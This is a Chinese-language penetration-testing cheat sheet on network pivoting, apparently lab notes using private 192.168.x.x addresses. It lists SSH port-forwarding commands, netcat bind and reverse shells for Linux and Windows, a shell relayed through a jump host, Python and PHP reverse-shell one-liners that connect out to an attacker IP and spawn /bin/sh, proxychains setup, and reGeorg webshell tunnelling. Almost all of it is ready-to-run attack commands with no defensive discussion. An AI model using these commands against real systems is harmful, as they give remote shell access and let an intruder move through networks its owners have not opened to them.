本地局域网端口转发

攻击机：ssh -CfNg -L 8888:192.168.11.13:3389 root@127.0.0.1

root密码无法成功被限制，修改sshd_config文件的PermitRootLogin为yes

vim /etc/ssh/sshd_config

远程连接

攻击机：rdesktop 127.0.0.1:8888

远程端口转发

边缘机：Nat（ip）：192.168.70.130   仅主机（局域网ip）：192.168.11.13

ssh -CfNg -R 8888:靶机ip:3389 root@攻击机ip

ssh -CfNg -R 8888:192.168.11.13:3389 root@192.168.70.132

攻击机：Nat（ip）：192.168.70.132

rdesktop 127.0.0.1:8888

动态端口转发

nc：正向shell

llinux靶机：nc -lvp 8888 -e /bin/bash

linux攻击机：nc 靶机Nat(ip) 8888

nc 192.168.70.130 8888

windows靶机：nc.exe -lvp 8888 -e cmd.exe

windows攻击机:nc.exe 靶机Nat(ip) 8888

nc 192.168.70.131 8888

反向shell

linux攻击机：nc -lvp 8888

linux靶机：nc 攻击机Nat(ip) 8888 -e /bin/bash

nc 192.168.70.132 8888 -e /bin/bash

windows攻击机:nc.exe -lvp 8888

windows靶机：nc.exe 攻击机Nat(ip) 8888 -e cmd.exe

nc.exe 192.168.133 8888 -e cmd.exe

通过跳板机反弹shell（linux）

windows靶机： nc.exe -lvp 6666 -e cmd.exe

linux攻击机：nc -lvp 8888

linux边界机： nc -nv 攻击机Nat(ip) 8888 -c "nc 靶机局域网ip 6666"

nc -nv 192.168.70.132 8888 -c "nc 192.168.11.13 6666"

windows靶机： nc.exe -lvp 6666 -e cmd.exe

windows攻击机：nc.exe -lvp 8888

windows边界机： nc.exe -nv 攻击机Nat(ip) 8888 -c "nc 靶机局域网ip 6666"

nc -nv 192.168.70.133 8888 -c "nc 192.168.11.13 6666"

反弹shell ---python

攻击机：nc -lvp 8888

靶机：执行命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

反弹shell ---php

攻击机：nc -lvp 8888

靶机：执行命令

php -r '$sock=fsockopen("192.168.6.157",8888);exec("/bin/sh -i <&3 >&3 2>&3");'

代理客户端工具——proxychains

• 攻击机客户端上配置：vim /etc/proxychains4.conf

修改配置文件 socks5 127.0.0.1 8888

• 例1：proxychains4 curl http://192.168.11.12

• 例2：proxychains4 nmap -Pn -sT -n 192.168.11.12 -p 3389,80,139

• 例3：proxychains4 firefox

• 例4：proxychains rdesktop 192.168.11.12 

reGeorg（ HTTP/HTTPS协议）

• HTTP Service代理将所有流量转发到内网，常见的有reGeorg、tuna

• reGeorg是reDuh的升级版，可以将内网服务器端口的数据通过http/https隧道转发

到本机，但是reGeorg的通信特征明显，会被很多杀毒软件查杀

• 支持 ASPX、PHP、JSP等Web脚本

• 下载： https://github.com/sensepost/reGeorg

• 边界机上：www目录下放置tunnel.nosocket.php文件，作为代理服务端

• 攻击机上：python reGeorgSocksProxy.py -u http://192.168.7.147/tunnel.nosocket.php -p 8888